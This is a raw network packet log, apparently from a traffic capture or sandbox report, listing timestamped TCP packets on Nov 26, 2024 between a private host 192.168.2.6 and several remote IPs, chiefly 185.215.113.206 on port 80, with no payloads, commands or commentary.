Nov 26, 2024 00:25:45.214114904 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.214157104 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.214266062 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.215193033 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.215259075 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.215291023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.215337992 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.216404915 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.216520071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.216551065 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.216856956 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.217514992 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.217583895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.217647076 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.217690945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.217818975 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.217889071 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.217919111 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.217951059 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.217982054 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.217993975 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.217999935 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.218036890 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.218079090 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.218115091 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.218736887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.218791962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.219152927 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.219202042 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.219892025 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.219942093 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.220000029 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.220041990 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.221038103 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.221087933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.221184969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.221237898 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.222238064 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.222306967 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.222345114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.222392082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.223424911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.223479033 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.223541021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.223670006 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.224594116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.224651098 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.224688053 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.224735022 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.225745916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.225805998 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.225907087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.225955963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.226965904 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.227027893 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.227104902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.227168083 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.228110075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.228169918 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.228302002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.228384972 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.229351997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.229363918 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.229422092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.229485035 CET	443	49857	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.229566097 CET	443	49857	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.229619980 CET	49857	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.229824066 CET	49857	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.229839087 CET	443	49857	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.229847908 CET	49857	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.229852915 CET	443	49857	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.230463982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.230525017 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.230586052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.230622053 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.231622934 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.231765032 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.231837034 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.231879950 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.232886076 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.232938051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.233057976 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.233098984 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.233978987 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.234025955 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.234091997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.234194994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.235129118 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.235193968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.235203981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.235327959 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.236362934 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.236422062 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.236449003 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.236494064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.237550020 CET	49869	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.237591028 CET	443	49869	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.237695932 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.237706900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.237719059 CET	49869	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.237751007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.238701105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.238827944 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.238842010 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.238890886 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.239854097 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.239901066 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.239932060 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.240051031 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.240442038 CET	49869	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.240463018 CET	443	49869	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.241034985 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.241096020 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.241353035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.241396904 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.242399931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.242434978 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.242454052 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.242475986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.243371010 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.243432045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.243536949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.243927956 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.244549036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.244615078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.244647980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.244719028 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.245930910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.245949030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.246021986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.246892929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.246964931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.247035027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.247529030 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.248089075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.248155117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.248159885 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.248394966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.249308109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.249352932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.249360085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.249399900 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.250566006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.250576973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.250616074 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.251629114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.251758099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.251807928 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.252748966 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.252793074 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.252911091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.253081083 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.253957033 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.254005909 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.254056931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.255171061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.255270958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.255326033 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.256284952 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.256335974 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.256400108 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.256525993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.257467985 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.257514954 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.257544041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.257917881 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.258622885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.258694887 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.258749962 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.258794069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.259802103 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.259845972 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.259944916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.259985924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.260972023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.261014938 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.261145115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.261256933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.262223959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.262236118 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.262263060 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.262279034 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.263366938 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.263464928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.263514042 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.264497995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.264565945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.264592886 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.264648914 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.265649080 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.265700102 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.268394947 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.268425941 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.394465923 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.394496918 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.394570112 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.394603968 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.394704103 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.397346973 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.397397041 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.397399902 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.397437096 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.405294895 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.405349016 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.405395031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.405442953 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.405850887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.405966997 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.405993938 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.406050920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.407052040 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.407105923 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.407461882 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.407504082 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.407515049 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.407563925 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.408670902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.408770084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.408773899 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.408812046 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.409813881 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.409868002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.410015106 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.410068989 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.410988092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.411061049 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.411087036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.411127090 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.412122011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.412195921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.412224054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.412316084 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.413319111 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.413389921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.413453102 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.413499117 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.414488077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.414550066 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.414588928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.414665937 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.415658951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.415707111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.415855885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.415910959 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.416855097 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.416918993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.416954041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.417006016 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.418009043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.418117046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.419136047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.419179916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.419235945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.419332027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.419398069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.419704914 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.419724941 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.420403004 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.420448065 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.420514107 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.421525002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.421623945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.421684980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.421725988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.422727108 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.422796965 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.422832966 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.422883987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.423926115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.423985958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.424046040 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.424180984 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.425112009 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.425159931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.425205946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.425245047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.426270008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.426316023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.426384926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.426601887 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.427450895 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.427509069 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.427519083 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.427547932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.428558111 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.428666115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.428720951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.429783106 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.429830074 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.429832935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.429871082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.430931091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.431010008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.431056023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.431109905 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.432109118 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.432229042 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.432243109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.432276964 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.433309078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.433362007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.433413029 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.433454037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.434429884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.434482098 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.434556961 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.434669018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.435682058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.435729980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.435746908 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.435843945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.436789989 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.436868906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.436922073 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.437159061 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.437254906 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.437280893 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.437295914 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.437347889 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.437387943 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.437412024 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.437436104 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.438004971 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.438057899 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.438108921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.438149929 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.439129114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.439186096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.439249992 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.439416885 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.440306902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.440387964 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.440428019 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.440511942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.441665888 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.441728115 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.441746950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.441951990 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.442673922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.442738056 CET	80	49795	185.215.113.206	192.168.2.6
